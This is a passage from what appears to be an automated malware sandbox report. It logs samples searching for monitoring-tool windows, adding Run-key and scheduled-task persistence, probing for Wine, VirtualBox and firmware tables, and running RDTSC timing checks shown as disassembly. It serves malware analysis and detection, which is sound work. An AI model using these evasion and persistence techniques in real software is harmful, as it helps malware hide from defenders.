Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Window searched: window name: Regmonclass
Creates job files (autostart)
Source: C:\Users\user\Documents\EBAEBFIIEC.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5a20612cd1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5a20612cd1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0882197cda.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0882197cda.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6693ff7180.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6693ff7180.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c573f8941.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c573f8941.exe Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5B55F0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12313CA second address: 12313E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FECC5126361h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12313E4 second address: 1231425 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECC5476B2Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jl 00007FECC5476B26h 0x00000013 jmp 00007FECC5476B34h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FECC5476B32h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231425 second address: 1231431 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231431 second address: 1231435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1231435 second address: 1231445 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FECC5126362h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123031D second address: 1230321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230321 second address: 1230327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230327 second address: 123032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230478 second address: 1230480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12305C7 second address: 12305CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12305CB second address: 12305CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12305CF second address: 12305E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12305E1 second address: 12305E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230738 second address: 123074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5476B30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123074C second address: 1230752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230752 second address: 1230778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FECC5476B26h 0x0000000e jmp 00007FECC5476B38h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12308DE second address: 12308E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12308E2 second address: 12308F3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FECC5476B26h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12308F3 second address: 1230900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FECC5126356h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230A77 second address: 1230A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B31h 0x00000007 jmp 00007FECC5476B30h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1230C05 second address: 1230C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FECC5126358h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FECC5126363h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12338ED second address: 1233927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jo 00007FECC5476B28h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007FECC5476B26h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f mov di, 53C4h 0x00000023 push 00000000h 0x00000025 mov di, FE00h 0x00000029 push F09757F5h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233927 second address: 123392C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123392C second address: 123399B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0F68A88Bh 0x00000010 mov edx, dword ptr [ebp+122D291Ch] 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D1DF4h], ecx 0x0000001e push 00000000h 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007FECC5476B28h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c or edi, 2961F009h 0x00000042 call 00007FECC5476B29h 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FECC5476B2Dh 0x0000004f push edi 0x00000050 pop edi 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123399B second address: 12339A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12339A1 second address: 12339A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12339A5 second address: 12339C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jg 00007FECC5126356h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12339C8 second address: 12339F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FECC5476B35h 0x00000012 jns 00007FECC5476B26h 0x00000018 popad 0x00000019 rdtsc
